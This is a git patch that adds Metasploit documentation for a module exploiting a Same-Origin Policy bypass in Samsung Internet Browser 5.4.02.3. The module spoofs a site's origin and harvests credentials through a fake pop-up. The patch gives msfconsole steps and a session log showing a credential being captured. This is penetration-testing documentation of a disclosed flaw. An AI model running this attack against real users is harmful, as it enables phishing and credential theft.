From 6b54fe67753404b73fbf6e4ad678e1aa78c7746a Mon Sep 17 00:00:00 2001 From: RootUp Date: Sat, 16 Dec 2017 22:26:08 +0530 Subject: [PATCH] Create samsung_browser_sop_bypass.md --- .../gather/samsung_browser_sop_bypass.md | 57 +++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100644 documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md diff --git a/documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md b/documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md new file mode 100644 index 0000000000..04bef5df90 --- /dev/null +++ b/documentation/modules/auxiliary/gather/samsung_browser_sop_bypass.md @@ -0,0 +1,57 @@ +## Description +This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices. +By default, it initiates a redirect to a child tab, and rewrites the innerHTML to gather credentials via a fake pop-up and the gather credentials is stored in `creds` + +## Vulnerable Application +This Modules was tested on Samsung Internet Browser 5.4.02.3 during development of this module. + +## Verification Steps +1. Start `msfconsole -q` +2. `use auxiliary/gather/samsung_browser_sop_bypass` +3. `set SRVHOST` +4. `set SRVPORT` +5. `set URIPATH` +6. `set TARGET_URL` +5. `run` + +## Scenarios +``` +$ sudo msfconsole -q +msf > use auxiliary/gather/samsung_browser_sop_bypass +msf auxiliary(samsung_browser_sop_bypass) > set SRVHOST 192.168.1.104 +SRVHOST => 192.168.1.104 +msf auxiliary(samsung_browser_sop_bypass) > set SRVPORT 9090 +SRVPORT => 9090 +msf auxiliary(samsung_browser_sop_bypass) > set URIPATH / +URIPATH => / +msf auxiliary(samsung_browser_sop_bypass) > set TARGET_URL https://www.google.com/csi +TARGET_URL => https://www.google.com/csi +msf auxiliary(samsung_browser_sop_bypass) > run +[*] Auxiliary module execution completed +msf auxiliary(samsung_browser_sop_bypass) > +[*] Using URL: http://192.168.1.104:9090/ +[*] Server started. +[*] 192.168.1.101: Request 'GET /' +[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi +[*] 192.168.1.101: Request 'GET /favicon.ico' +[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi +[*] 192.168.1.101: Request 'GET /favicon.ico' +[*] 192.168.1.101: Attempting to spoof origin for https://www.google.com/csi +[+] 192.168.1.101: Collected credential for 'https://www.google.com/csi' emailID:MyStrongPassword + +msf auxiliary(samsung_browser_sop_bypass) > creds +Credentials +=========== + +host origin service public private realm private_type +---- ------ ------- ------ ------- ----- ------------ + emailID MyStrongPassword https://www.google.com/csi Password + +msf auxiliary(samsung_browser_sop_bypass) > +``` + +## Demos + +Working of MSF Module: `https://youtu.be/ulU98cWVhoI` + +Vulnerable Browser: `https://youtu.be/lpkbogxJXnw`